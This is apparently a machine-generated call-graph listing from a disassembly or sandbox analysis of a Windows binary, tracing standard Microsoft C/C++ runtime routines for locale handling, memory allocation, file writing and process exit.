19270->19273 19276 c7a20b __alloca_probe_16 19270->19276 19274 c68e40 __freea 14 API calls 19271->19274 19272->19263 19273->19276 19274->19272 19275->19272 19276->19271 19277 c78f2f std::_Locinfo::_Locinfo_ctor 6 API calls 19276->19277 19278 c7a24e 19277->19278 19278->19271 19289 c7cd2a 19278->19289 19280 c7a268 19280->19271 19281 c7a271 19280->19281 19282 c68e40 __freea 14 API calls 19281->19282 19282->19272 19284 c78a21 std::_Lockit::_Lockit 5 API calls 19283->19284 19285 c78f3a 19284->19285 19286 c78f40 19285->19286 19287 c78f8c std::_Locinfo::_Locinfo_ctor 5 API calls 19285->19287 19286->19269 19286->19270 19286->19272 19288 c78f80 LCMapStringW 19287->19288 19288->19286 19291 c7cd41 WideCharToMultiByte 19289->19291 19291->19280 19292->19162 19303 c71ebd 19293->19303 19295 c7d8c6 19296 c71ebd __fread_nolock 41 API calls 19295->19296 19297 c7d8e5 19296->19297 19298 c7d87a 19297->19298 19299 c7745c ___free_lconv_mon 14 API calls 19297->19299 19300 c7d898 19298->19300 19299->19298 19317 c70871 LeaveCriticalSection 19300->19317 19302 c7d886 19302->18811 19304 c71ece 19303->19304 19311 c71eca codecvt 19303->19311 19305 c71ed5 19304->19305 19308 c71ee8 __fread_nolock 19304->19308 19306 c7127e __strnicoll 14 API calls 19305->19306 19307 c71eda 19306->19307 19309 c6da7f __strnicoll 41 API calls 19307->19309 19310 c71f16 19308->19310 19308->19311 19313 c71f1f 19308->19313 19309->19311 19312 c7127e __strnicoll 14 API calls 19310->19312 19311->19295 19314 c71f1b 19312->19314 19313->19311 19315 c7127e __strnicoll 14 API calls 19313->19315 19316 c6da7f __strnicoll 41 API calls 19314->19316 19315->19314 19316->19311 19317->19302 19319 c762e7 19318->19319 19320 c762f5 19318->19320 19319->19320 19325 c7630d 19319->19325 19321 c7127e __strnicoll 14 API calls 19320->19321 19322 c762fd 19321->19322 19323 c6da7f __strnicoll 41 API calls 19322->19323 19324 c76307 19323->19324 19324->18759 19325->19324 19326 c7127e __strnicoll 14 API calls 19325->19326 19326->19322 19328 c74096 19327->19328 19332 c74067 19327->19332 19329 c740ad 19328->19329 19330 c7745c ___free_lconv_mon 14 API calls 19328->19330 19331 c7745c ___free_lconv_mon 14 API calls 19329->19331 19330->19328 19331->19332 19332->18760 19334 c6dab8 19333->19334 19335 c6d883 CallUnexpected 8 API calls 19334->19335 19336 c6dacd GetCurrentProcess TerminateProcess 19335->19336 19336->18766 19338 c61466 19337->19338 19338->19338 19418 c62ec0 19338->19418 19340 c614b8 19341 c62420 72 API calls 19340->19341 19348 c614bd std::ios_base::_Ios_base_dtor 19340->19348 19341->19348 19342 c616be std::ios_base::_Init 19427 c62dd0 19342->19427 19343 c61685 19344 c61698 19343->19344 19423 c63b00 19343->19423 19351 c62420 19344->19351 19348->19342 19348->19343 19350 c616fe 19572 c6599b 19351->19572 19354 c6599b std::_Lockit::_Lockit 7 API calls 19356 c62454 19354->19356 19355 c62475 19360 c624c5 19355->19360 19361 c624da 19355->19361 19371 c625e0 19355->19371 19578 c659f3 19356->19578 19357 c659f3 std::_Lockit::~_Lockit 2 API calls 19358 c625f9 19357->19358 19358->18576 19362 c659f3 std::_Lockit::~_Lockit 2 API calls 19360->19362 19363 c69271 codecvt 16 API calls 19361->19363 19364 c624d0 19362->19364 19367 c624e1 19363->19367 19364->18576 19365 c6259e 19366 c625da 19365->19366 19616 c62fe0 19365->19616 19631 c65f18 19366->19631 19367->19365 19370 c6599b std::_Lockit::_Lockit 7 API calls 19367->19370 19372 c62518 19370->19372 19371->19357 19373 c62603 19372->19373 19374 c6256b 19372->19374 19634 c65b7a 19373->19634 19585 c66048 19374->19585 19383 c62ec0 43 API calls 19382->19383 19384 c6563e 19383->19384 19386 c656d0 19384->19386 19387 c6570b std::ios_base::_Init 19384->19387 19385 c656e3 19393 c64fb0 19385->19393 19386->19385 19388 c63b00 43 API calls 19386->19388 19389 c62dd0 std::ios_base::_Init 43 API calls 19387->19389 19388->19385 19390 c6573d 19389->19390 19391 c69ea0 CallUnexpected RaiseException 19390->19391 19392 c6574b 19391->19392 19394 c64ff1 19393->19394 19395 c65083 19393->19395 19396 c62ec0 43 API calls 19394->19396 19405 c69271 19395->19405 19397 c64ffa 19396->19397 19398 c65072 19397->19398 19399 c650ac std::ios_base::_Init 19397->19399 19398->19395 19400 c63b00 43 API calls 19398->19400 19401 c62dd0 std::ios_base::_Init 43 API calls 19399->19401 19400->19395 19402 c650de 19401->19402 19403 c69ea0 CallUnexpected RaiseException 19402->19403 19404 c650ec 19403->19404 19407 c69276 19405->19407 19406 c708e3 _Yarn 15 API calls 19406->19407 19407->19406 19408 c69290 19407->19408 19409 c75d72 codecvt 2 API calls 19407->19409 19410 c69292 codecvt 19407->19410 19408->18582 19409->19407 19411 c69ea0 CallUnexpected RaiseException 19410->19411 19412 c69bc1 19411->19412 19923 c61200 19413->19923 19417 c875a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19417->18581 19420 c62ed7 19418->19420 19419 c62eeb 19419->19340 19420->19419 19421 c64fb0 43 API calls 19420->19421 19422 c62f07 19421->19422 19422->19340 19424 c63b63 19423->19424 19425 c63b3e 19423->19425 19424->19344 19425->19424 19444 c65790 19425->19444 19428 c62e10 19427->19428 19428->19428 19455 c617d0 19428->19455 19430 c62e24 19463 c62a00 19430->19463 19432 c62e5a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19433 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19432->19433 19435 c616f0 19433->19435 19434 c62e32 19434->19432 19436 c62e81 19434->19436 19441 c69ea0 19435->19441 19483 c6da8f 19436->19483 19442 c69ee7 RaiseException 19441->19442 19443 c69eba 19441->19443 19442->19350 19443->19442 19447 c63fa0 19444->19447 19446 c657ae 19446->19424 19448 c63fb4 19447->19448 19448->19446 19449 c69ea0 CallUnexpected RaiseException 19448->19449 19450 c63fcc std::ios_base::_Init 19448->19450 19449->19450 19451 c62dd0 std::ios_base::_Init 43 API calls 19450->19451 19452 c64003 19451->19452 19453 c69ea0 CallUnexpected RaiseException 19452->19453 19454 c64012 19453->19454 19456 c61859 19455->19456 19459 c617e0 19455->19459 19509 c63cb0 19456->19509 19460 c617e5 codecvt 19459->19460 19488 c61770 19459->19488 19460->19430 19462 c61833 codecvt 19462->19430 19464 c62a28 19463->19464 19465 c62be5 19464->19465 19468 c62a39 19464->19468 19466 c63cb0 std::_Throw_Cpp_error 43 API calls 19465->19466 19467 c62bea 19466->19467 19469 c6da8f std::_Throw_Cpp_error 41 API calls 19467->19469 19471 c61770 std::_Throw_Cpp_error 43 API calls 19468->19471 19478 c62a3e codecvt 19468->19478 19470 c62bef 19469->19470 19472 c6da8f std::_Throw_Cpp_error 41 API calls 19470->19472 19471->19478 19473 c62bf4 19472->19473 19474 c69e1e std::invalid_argument::invalid_argument 42 API calls 19473->19474 19477 c62c22 19474->19477 19475 c62b2a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19476 c69e1e std::invalid_argument::invalid_argument 42 API calls 19475->19476 19479 c62b7f 19476->19479 19477->19434 19478->19467 19478->19475 19479->19470 19480 c62bb0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19479->19480 19481 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19480->19481 19482 c62bdf 19481->19482 19482->19434 19484 c6d9cb __strnicoll 41 API calls 19483->19484 19485 c6da9e 19484->19485 19486 c6daac __Getctype 11 API calls 19485->19486 19487 c6daab 19486->19487 19489 c617a3 19488->19489 19490 c61780 19488->19490 19493 c617b4 19489->19493 19494 c69271 codecvt 16 API calls 19489->19494 19491 c61787 19490->19491 19492 c617ba 19490->19492 19496 c69271 codecvt 16 API calls 19491->19496 19540 c63c70 19492->19540 19493->19462 19497 c617ad 19494->19497 19498 c6178d 19496->19498 19497->19462 19499 c6da8f std::_Throw_Cpp_error 41 API calls 19498->19499 19500 c61796 19498->19500 19501 c617c4 19499->19501 19500->19462 19502 c61859 19501->19502 19506 c617e0 19501->19506 19504 c63cb0 std::_Throw_Cpp_error 43 API calls 19502->19504 19503 c617e5 codecvt 19503->19462 19505 c6185e 19504->19505 19506->19503 19507 c61770 std::_Throw_Cpp_error 43 API calls 19506->19507 19508 c61833 codecvt 19507->19508 19508->19462 19544 c65b3a 19509->19544 19541 c63c7b codecvt 19540->19541 19542 c69ea0 CallUnexpected RaiseException 19541->19542 19543 c63c8a 19542->19543 19549 c65a5d 19544->19549 19547 c69ea0 CallUnexpected RaiseException 19548 c65b59 19547->19548 19552 c62d40 19549->19552 19555 c69e1e 19552->19555 19556 c69e2b 19555->19556 19562 c62d6e 19555->19562 19556->19562 19563 c708e3 19556->19563 19559 c69e58 19561 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19559->19561 19560 c762d9 std::invalid_argument::invalid_argument 41 API calls 19560->19559 19561->19562 19562->19547 19564 c77686 19563->19564 19565 c776c4 19564->19565 19567 c776af HeapAlloc 19564->19567 19570 c77698 __strnicoll 19564->19570 19566 c7127e __strnicoll 14 API calls 19565->19566 19569 c69e48 19566->19569 19568 c776c2 19567->19568 19567->19570 19568->19569 19569->19559 19569->19560 19570->19565 19570->19567 19571 c75d72 codecvt EnterCriticalSection LeaveCriticalSection 19570->19571 19571->19570 19573 c659aa 19572->19573 19575 c659b1 19572->19575 19639 c70888 19573->19639 19576 c6243a 19575->19576 19644 c68b76 EnterCriticalSection 19575->19644 19576->19354 19576->19355 19579 c70896 19578->19579 19580 c659fd 19578->19580 19697 c70871 LeaveCriticalSection 19579->19697 19584 c65a10 19580->19584 19696 c68b84 LeaveCriticalSection 19580->19696 19583 c7089d 19583->19355 19584->19355 19698 c70b43 19585->19698 19589 c6606c 19590 c70b43 std::_Locinfo::_Locinfo_ctor 68 API calls 19589->19590 19591 c6607c 19589->19591 19590->19591 19592 c65ea2 _Yarn 15 API calls 19591->19592 19593 c62576 19592->19593 19594 c6615d 19593->19594 19878 c70cb4 19594->19878 19596 c66166 __Getctype 19597 c66180 19596->19597 19598 c6619e 19596->19598 19883 c70b7b 19597->19883 19600 c70b7b __Getctype 41 API calls 19598->19600 19601 c66187 19600->19601 19888 c70cd9 19601->19888 19604 c6258d 19606 c662d4 19604->19606 19607 c662e7 __fread_nolock 19606->19607 19608 c70cb4 __Getctype 41 API calls 19607->19608 19609 c662ef 19608->19609 19911 c70d00 19609->19911 19612 c70cd9 __Getctype 41 API calls 19613 c662fe 19612->19613 19614 c70b7b __Getctype 41 API calls 19613->19614 19615 c66315 19613->19615 19614->19615 19615->19365 19916 c66093 19616->19916 19619 c62ff9 19621 c63010 19619->19621 19623 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19619->19623 19620 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19620->19619 19622 c63027 19621->19622 19624 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19621->19624 19625 c6303e 19622->19625 19626 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19622->19626 19623->19621 19624->19622 19627 c63055 19625->19627 19628 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19625->19628 19626->19625 19629 c6306c 19627->19629 19630 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19627->19630 19628->19627 19630->19629 19632 c69271 codecvt 16 API calls 19631->19632 19633 c65f23 19632->19633 19633->19371 19920 c65ad1 19634->19920 19637 c69ea0 CallUnexpected RaiseException 19638 c65b99 19637->19638 19645 c79031 19639->19645 19644->19576 19666 c78937 19645->19666 19665 c79063 19665->19665 19667 c78b20 std::_Lockit::_Lockit 5 API calls 19666->19667 19668 c7894d 19667->19668 19669 c78951 19668->19669 19670 c78b20 std::_Lockit::_Lockit 5 API calls 19669->19670 19671 c78967 19670->19671 19672 c7896b 19671->19672 19673 c78b20 std::_Lockit::_Lockit 5 API calls 19672->19673 19674 c78981 19673->19674 19675 c78985 19674->19675 19676 c78b20 std::_Lockit::_Lockit 5 API calls 19675->19676 19677 c7899b 19676->19677 19678 c7899f 19677->19678 19679 c78b20 std::_Lockit::_Lockit 5 API calls 19678->19679 19680 c789b5 19679->19680 19681 c789b9 19680->19681 19682 c78b20 std::_Lockit::_Lockit 5 API calls 19681->19682 19683 c789cf 19682->19683 19684 c789d3 19683->19684 19685 c78b20 std::_Lockit::_Lockit 5 API calls 19684->19685 19686 c789e9 19685->19686 19687 c789ed 19686->19687 19688 c78b20 std::_Lockit::_Lockit 5 API calls 19687->19688 19689 c78a03 19688->19689 19690 c78a21 19689->19690 19691 c78b20 std::_Lockit::_Lockit 5 API calls 19690->19691 19692 c78a37 19691->19692 19693 c78a07 19692->19693 19694 c78b20 std::_Lockit::_Lockit 5 API calls 19693->19694 19695 c78a1d 19694->19695 19695->19665 19696->19584 19697->19583 19699 c79031 std::_Lockit::_Lockit 5 API calls 19698->19699 19700 c70b50 19699->19700 19709 c708ee 19700->19709 19703 c65ea2 19704 c65eb0 19703->19704 19708 c65edb codecvt 19703->19708 19705 c65ebc 19704->19705 19706 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19704->19706 19707 c708e3 _Yarn 15 API calls 19705->19707 19705->19708 19706->19705 19707->19708 19708->19589 19710 c708fa ___scrt_is_nonwritable_in_current_image 19709->19710 19717 c70829 EnterCriticalSection 19710->19717 19712 c70908 19718 c70949 19712->19718 19717->19712 19743 c70aa8 19718->19743 19720 c70964 19721 c76730 __Getctype 41 API calls 19720->19721 19739 c70915 19720->19739 19722 c70971 19721->19722 19767 c79ce5 19722->19767 19725 c7099d 19728 c6daac __Getctype 11 API calls 19725->19728 19725->19739 19726 c77686 __fread_nolock 15 API calls 19727 c709c2 19726->19727 19730 c79ce5 std::_Locinfo::_Locinfo_ctor 43 API calls 19727->19730 19727->19739 19729 c70aa7 19728->19729 19731 c709de 19730->19731 19732 c709e5 19731->19732 19733 c70a00 19731->19733 19732->19725 19734 c709f7 19732->19734 19735 c7745c ___free_lconv_mon 14 API calls 19733->19735 19737 c70a2b 19733->19737 19736 c7745c ___free_lconv_mon 14 API calls 19734->19736 19735->19737 19736->19739 19738 c7745c ___free_lconv_mon 14 API calls 19737->19738 19737->19739 19738->19739 19740 c7093d 19739->19740 19877 c70871 LeaveCriticalSection 19740->19877 19742 c66054 19742->19703 19744 c70ab4 19743->19744 19745 c70ac2 19743->19745 19773 c75046 19744->19773 19788 c79923 19745->19788 19748 c70abe 19748->19720 19750 c773ff __strnicoll 14 API calls 19753 c70af4 19750->19753 19751 c70b38 19752 c6daac __Getctype 11 API calls 19751->19752 19754 c70b42 19752->19754 19755 c70b1c 19753->19755 19756 c79923 std::_Locinfo::_Locinfo_ctor 43 API calls 19753->19756 19758 c79031 std::_Lockit::_Lockit 5 API calls 19754->19758 19757 c7745c ___free_lconv_mon 14 API calls 19755->19757 19759 c70b0b 19756->19759 19760 c70b31 19757->19760 19761 c70b50 19758->19761 19762 c70b12 19759->19762 19763 c70b1e 19759->19763 19760->19720 19764 c708ee std::_Locinfo::_Locinfo_ctor 68 API calls 19761->19764 19762->19751 19762->19755 19765 c75046 std::_Locinfo::_Locinfo_ctor 65 API calls 19763->19765 19766 c70b79 19764->19766 19765->19755 19766->19720 19768 c79cf9 _Fputc 19767->19768 19833 c79960 19768->19833 19771 c6d7bb _Fputc 41 API calls 19772 c70996 19771->19772 19772->19725 19772->19726 19774 c75070 19773->19774 19775 c7505c 19773->19775 19777 c76730 __Getctype 41 API calls 19774->19777 19776 c7127e __strnicoll 14 API calls 19775->19776 19778 c75061 19776->19778 19779 c75075 19777->19779 19780 c6da7f __strnicoll 41 API calls 19778->19780 19781 c79031 std::_Lockit::_Lockit 5 API calls 19779->19781 19782 c7506c 19780->19782 19783 c7507d 19781->19783 19782->19748 19784 c7f73f __Getctype 41 API calls 19783->19784 19785 c75082 19784->19785 19794 c7464e 19785->19794 19787 c750c4 19787->19748 19789 c79936 _Fputc 19788->19789 19805 c79678 19789->19805 19792 c6d7bb _Fputc 41 API calls 19793 c70ad9 19792->19793 19793->19750 19793->19751 19795 c7465a ___scrt_is_nonwritable_in_current_image 19794->19795 19798 c7477b 19795->19798 19797 c74666 std::_Locinfo::_Locinfo_ctor 19797->19787 19799 c773ff __strnicoll 14 API calls 19798->19799 19800 c74793 19799->19800 19801 c7745c ___free_lconv_mon 14 API calls 19800->19801 19802 c747a0 19801->19802 19803 c747e1 19802->19803 19804 c74601 std::_Locinfo::_Locinfo_ctor 65 API calls 19802->19804 19803->19797 19804->19803 19806 c7968b 19805->19806 19807 c7968f 19806->19807 19809 c796b7 19806->19809 19808 c6da02 _Fputc 41 API calls 19807->19808 19812 c796ad 19808->19812 19813 c796dc 19809->19813 19814 c79758 19809->19814 19811 c6da02 _Fputc 41 API calls 19811->19812 19812->19792 19813->19811 19813->19812 19815 c7978e 19814->19815 19816 c797c6 19815->19816 19817 c797a2 19815->19817 19828 c797bb 19815->19828 19818 c797d6 19816->19818 19820 c6e4e0 _Fputc 41 API calls 19816->19820 19819 c6da02 _Fputc 41 API calls 19817->19819 19821 c797f0 19818->19821 19822 c7980e 19818->19822 19819->19828 19820->19818 19823 c82893 std::_Locinfo::_Locinfo_ctor 5 API calls 19821->19823 19824 c79816 19822->19824 19825 c798cf 19822->19825 19823->19828 19827 c7ccae __fread_nolock MultiByteToWideChar 19824->19827 19824->19828 19826 c7ccae __fread_nolock MultiByteToWideChar 19825->19826 19825->19828 19826->19828 19829 c7984d 19827->19829 19828->19813 19828->19828 19829->19828 19830 c79858 GetLastError 19829->19830 19830->19828 19831 c79878 19830->19831 19831->19828 19832 c7ccae __fread_nolock MultiByteToWideChar 19831->19832 19832->19828 19834 c79977 19833->19834 19835 c7997b 19834->19835 19837 c799a3 19834->19837 19836 c6da02 _Fputc 41 API calls 19835->19836 19840 c79999 19836->19840 19841 c799c5 19837->19841 19842 c79a3e 19837->19842 19839 c6da02 _Fputc 41 API calls 19839->19840 19840->19771 19841->19839 19841->19840 19843 c79a6e 19842->19843 19844 c79a7d 19843->19844 19845 c79a9b 19843->19845 19856 c79a72 19843->19856 19846 c6da02 _Fputc 41 API calls 19844->19846 19854 c79aa8 19845->19854 19866 c6e4e0 19845->19866 19846->19856 19847 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19853 c79ce3 19847->19853 19849 c79ac2 19873 c83878 19849->19873 19850 c79ae0 19851 c79af4 19850->19851 19852 c79c70 19850->19852 19851->19856 19858 c79b8e 19851->19858 19862 c79b38 19851->19862 19852->19856 19857 c7cd2a _Fputc WideCharToMultiByte 19852->19857 19853->19841 19854->19849 19854->19850 19856->19847 19857->19856 19859 c7cd2a _Fputc WideCharToMultiByte 19858->19859 19861 c79ba1 19859->19861 19860 c7cd2a _Fputc WideCharToMultiByte 19860->19856 19861->19856 19863 c79bba GetLastError 19861->19863 19862->19860 19863->19856 19864 c79bc9 19863->19864 19864->19856 19865 c7cd2a _Fputc WideCharToMultiByte 19864->19865 19865->19864 19867 c6d866 _Fputc 41 API calls 19866->19867 19868 c6e4f0 19867->19868 19869 c775f7 _Fputc 41 API calls 19868->19869 19870 c6e50d 19869->19870 19871 c77655 _Fputc 41 API calls 19870->19871 19872 c6e51a 19871->19872 19872->19854 19874 c838af std::_Locinfo::_Locinfo_ctor codecvt 19873->19874 19875 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19874->19875 19876 c83982 19875->19876 19876->19856 19877->19742 19879 c76730 __Getctype 41 API calls 19878->19879 19880 c70cbf 19879->19880 19881 c775ca __Getctype 41 API calls 19880->19881 19882 c70ccf 19881->19882 19882->19596 19884 c76730 __Getctype 41 API calls 19883->19884 19885 c70b86 19884->19885 19886 c775ca __Getctype 41 API calls 19885->19886 19887 c70b96 19886->19887 19887->19601 19889 c76730 __Getctype 41 API calls 19888->19889 19890 c70ce4 19889->19890 19891 c775ca __Getctype 41 API calls 19890->19891 19892 c661af 19891->19892 19892->19604 19893 c71182 19892->19893 19894 c7118f 19893->19894 19895 c711ca 19893->19895 19896 c708e3 _Yarn 15 API calls 19894->19896 19895->19604 19897 c711b2 19896->19897 19897->19895 19902 c7a2fa 19897->19902 19900 c6daac __Getctype 11 API calls 19901 c711e0 19900->19901 19903 c7a316 19902->19903 19904 c7a308 19902->19904 19905 c7127e __strnicoll 14 API calls 19903->19905 19904->19903 19909 c7a330 19904->19909 19906 c7a320 19905->19906 19907 c6da7f __strnicoll 41 API calls 19906->19907 19908 c711c3 19907->19908 19908->19895 19908->19900 19909->19908 19910 c7127e __strnicoll 14 API calls 19909->19910 19910->19906 19912 c76730 __Getctype 41 API calls 19911->19912 19913 c70d0b 19912->19913 19914 c775ca __Getctype 41 API calls 19913->19914 19915 c662f6 19914->19915 19915->19612 19917 c6609f 19916->19917 19919 c62fe9 19916->19919 19918 c70b43 std::_Locinfo::_Locinfo_ctor 68 API calls 19917->19918 19918->19919 19919->19619 19919->19620 19921 c62d40 std::invalid_argument::invalid_argument 42 API calls 19920->19921 19922 c65ae3 19921->19922 19922->19637 19924 c61236 19923->19924 19925 c62ec0 43 API calls 19924->19925 19926 c61283 19925->19926 19927 c613e3 std::ios_base::_Init 19926->19927 19928 c613aa 19926->19928 19931 c62dd0 std::ios_base::_Init 43 API calls 19927->19931 19929 c613bd 19928->19929 19930 c63b00 43 API calls 19928->19930 19935 c621f0 19929->19935 19930->19929 19932 c61417 19931->19932 19933 c69ea0 CallUnexpected RaiseException 19932->19933 19934 c61425 19933->19934 19936 c62210 19935->19936 19943 c62260 19936->19943 19938 c6221a 19972 c654b0 19938->19972 19941 c64fb0 43 API calls 19942 c62255 19941->19942 19942->19417 19944 c6599b std::_Lockit::_Lockit 7 API calls 19943->19944 19945 c6227a 19944->19945 19946 c6599b std::_Lockit::_Lockit 7 API calls 19945->19946 19950 c622b5 19945->19950 19947 c62294 19946->19947 19949 c659f3 std::_Lockit::~_Lockit 2 API calls 19947->19949 19948 c659f3 std::_Lockit::~_Lockit 2 API calls 19951 c623fd 19948->19951 19949->19950 19952 c62317 19950->19952 19953 c62302 19950->19953 19963 c623e4 19950->19963 19951->19938 19954 c69271 codecvt 16 API calls 19952->19954 19955 c659f3 std::_Lockit::~_Lockit 2 API calls 19953->19955 19957 c6231e 19954->19957 19956 c6230d 19955->19956 19956->19938 19958 c623ba 19957->19958 19962 c6599b std::_Lockit::_Lockit 7 API calls 19957->19962 19959 c623de 19958->19959 19960 c62fe0 codecvt 68 API calls 19958->19960 19961 c65f18 std::_Facet_Register 16 API calls 19959->19961 19960->19959 19961->19963 19964 c62352 19962->19964 19963->19948 19965 c62407 19964->19965 19966 c62398 19964->19966 19968 c65b7a codecvt 43 API calls 19965->19968 19967 c66048 std::_Locinfo::_Locinfo_ctor 69 API calls 19966->19967 19969 c623a3 19967->19969 19970 c62411 19968->19970 19971 c6615d __Getctype 42 API calls 19969->19971 19971->19958 19973 c62ec0 43 API calls 19972->19973 19974 c654ee 19973->19974 19975 c655b3 std::ios_base::_Init 19974->19975 19976 c65578 19974->19976 19979 c62dd0 std::ios_base::_Init 43 API calls 19975->19979 19977 c63b00 43 API calls 19976->19977 19978 c6224e 19976->19978 19977->19978 19978->19941 19980 c655e5 19979->19980 19981 c69ea0 CallUnexpected RaiseException 19980->19981 19982 c655f3 19981->19982 19984 c7439e 19983->19984 19992 c743af 19983->19992 19994 c74439 GetModuleHandleW 19984->19994 19988 c743ed 19988->18555 20001 c74239 19992->20001 19995 c743a3 19994->19995 19995->19992 19996 c7449e GetModuleHandleExW 19995->19996 19997 c744f1 19996->19997 19998 c744dd GetProcAddress 19996->19998 19999 c74504 FreeLibrary 19997->19999 20000 c7450d 19997->20000 19998->19997 19999->20000 20000->19992 20002 c74245 ___scrt_is_nonwritable_in_current_image 20001->20002 20016 c70829 EnterCriticalSection 20002->20016 20004 c7424f 20017 c74286 20004->20017 20006 c7425c 20021 c7427a 20006->20021 20009 c74408 20046 c7447c 20009->20046 20012 c74426 20014 c7449e CallUnexpected 3 API calls 20012->20014 20013 c74416 GetCurrentProcess TerminateProcess 20013->20012 20015 c7442e ExitProcess 20014->20015 20016->20004 20018 c74292 ___scrt_is_nonwritable_in_current_image 20017->20018 20019 c742f9 CallUnexpected 20018->20019 20024 c760a3 20018->20024 20019->20006 20045 c70871 LeaveCriticalSection 20021->20045 20023 c74268 20023->19988 20023->20009 20025 c760af __EH_prolog3 20024->20025 20028 c75dfb 20025->20028 20027 c760d6 codecvt 20027->20019 20029 c75e07 ___scrt_is_nonwritable_in_current_image 20028->20029 20036 c70829 EnterCriticalSection 20029->20036 20031 c75e15 20037 c75fb3 20031->20037 20036->20031 20038 c75e22 20037->20038 20039 c75fd2 20037->20039 20041 c75e4a 20038->20041 20039->20038 20040 c7745c ___free_lconv_mon 14 API calls 20039->20040 20040->20038 20044 c70871 LeaveCriticalSection 20041->20044 20043 c75e33 20043->20027 20044->20043 20045->20023 20051 c790f6 GetPEB 20046->20051 20049 c74486 GetPEB 20050 c74412 20049->20050 20050->20012 20050->20013 20052 c79110 20051->20052 20054 c74481 20051->20054 20055 c78ba3 20052->20055 20054->20049 20054->20050 20056 c78b20 std::_Lockit::_Lockit 5 API calls 20055->20056 20057 c78bbf 20056->20057 20057->20054 20060 c76255 20058->20060 20061 c76267 ___scrt_uninitialize_crt 20058->20061 20059 c76263 20059->18600 20060->20059 20063 c71883 20060->20063 20061->18600 20066 c71710 20063->20066 20069 c71604 20066->20069 20070 c71610 ___scrt_is_nonwritable_in_current_image 20069->20070 20077 c70829 EnterCriticalSection 20070->20077 20072 c71686 20086 c716a4 20072->20086 20075 c7161a ___scrt_uninitialize_crt 20075->20072 20078 c71578 20075->20078 20077->20075 20079 c71584 ___scrt_is_nonwritable_in_current_image 20078->20079 20089 c713fb EnterCriticalSection 20079->20089 20081 c7158e ___scrt_uninitialize_crt 20082 c715c7 20081->20082 20090 c7181e 20081->20090 20103 c715f8 20082->20103 20205 c70871 LeaveCriticalSection 20086->20205 20088 c71692 20088->20059 20089->20081 20091 c71833 _Fputc 20090->20091 20092 c71845 20091->20092 20093 c7183a 20091->20093 20106 c717b5 20092->20106 20094 c71710 ___scrt_uninitialize_crt 70 API calls 20093->20094 20096 c71840 20094->20096 20098 c6d7bb _Fputc 41 API calls 20096->20098 20099 c7187d 20098->20099 20099->20082 20101 c71866 20119 c7a6fa 20101->20119 20204 c7140f LeaveCriticalSection 20103->20204 20105 c715e6 20105->20075 20107 c717f5 20106->20107 20108 c717ce 20106->20108 20107->20096 20112 c7852c 20107->20112 20108->20107 20109 c7852c _Fputc 41 API calls 20108->20109 20110 c717ea 20109->20110 20130 c7af25 20110->20130 20113 c7854d 20112->20113 20114 c78538 20112->20114 20113->20101 20115 c7127e __strnicoll 14 API calls 20114->20115 20116 c7853d 20115->20116 20117 c6da7f __strnicoll 41 API calls 20116->20117 20118 c78548 20117->20118 20118->20101 20120 c7a70b 20119->20120 20121 c7a718 20119->20121 20122 c7127e __strnicoll 14 API calls 20120->20122 20123 c7a761 20121->20123 20126 c7a73f 20121->20126 20128 c7a710 20122->20128 20124 c7127e __strnicoll 14 API calls 20123->20124 20125 c7a766 20124->20125 20127 c6da7f __strnicoll 41 API calls 20125->20127 20171 c7a658 20126->20171 20127->20128 20128->20096 20132 c7af31 ___scrt_is_nonwritable_in_current_image 20130->20132 20131 c7aff5 20133 c6da02 _Fputc 41 API calls 20131->20133 20132->20131 20134 c7af86 20132->20134 20140 c7af39 20132->20140 20133->20140 20141 c7e652 EnterCriticalSection 20134->20141 20136 c7af8c 20137 c7afa9 20136->20137 20142 c7b02d 20136->20142 20168 c7afed 20137->20168 20140->20107 20141->20136 20143 c7b052 20142->20143 20165 c7b075 __fread_nolock 20142->20165 20144 c7b056 20143->20144 20146 c7b0b4 20143->20146 20145 c6da02 _Fputc 41 API calls 20144->20145 20145->20165 20147 c7b0cb 20146->20147 20148 c7cbbe ___scrt_uninitialize_crt 43 API calls 20146->20148 20149 c7abb1 ___scrt_uninitialize_crt 42 API calls 20147->20149 20148->20147 20150 c7b0d5 20149->20150 20151 c7b11b 20150->20151 20152 c7b0db 20150->20152 20153 c7b12f 20151->20153 20154 c7b17e WriteFile 20151->20154 20155 c7b105 20152->20155 20156 c7b0e2 20152->20156 20159 c7b137 20153->20159 20160 c7b16c 20153->20160 20157 c7b1a0 GetLastError 20154->20157 20154->20165 20158 c7a777 ___scrt_uninitialize_crt 47 API calls 20155->20158 20163 c7ab49 ___scrt_uninitialize_crt 6 API calls 20156->20163 20156->20165 20157->20165 20158->20165 20161 c7b13c 20159->20161 20162 c7b15a 20159->20162 20164 c7ac2f ___scrt_uninitialize_crt 7 API calls 20160->20164 20161->20165 20167 c7ad0a ___scrt_uninitialize_crt 7 API calls 20161->20167 20166 c7adf3 ___scrt_uninitialize_crt 8 API calls 20162->20166 20163->20165 20164->20165 20165->20137 20166->20165 20167->20165 20169 c7e675 ___scrt_uninitialize_crt LeaveCriticalSection 20168->20169 20170 c7aff3 20169->20170 20170->20140 20172 c7a664 ___scrt_is_nonwritable_in_current_image 20171->20172 20184 c7e652 EnterCriticalSection 20172->20184 20174 c7a673 20183 c7a6b8 20174->20183 20185 c7e729 20174->20185 20176 c7127e __strnicoll 14 API calls 20179 c7a6bf 20176->20179 20177 c7a69f FlushFileBuffers 20178 c7a6ab GetLastError 20177->20178 20177->20179 20198 c7126b 20178->20198 20201 c7a6ee 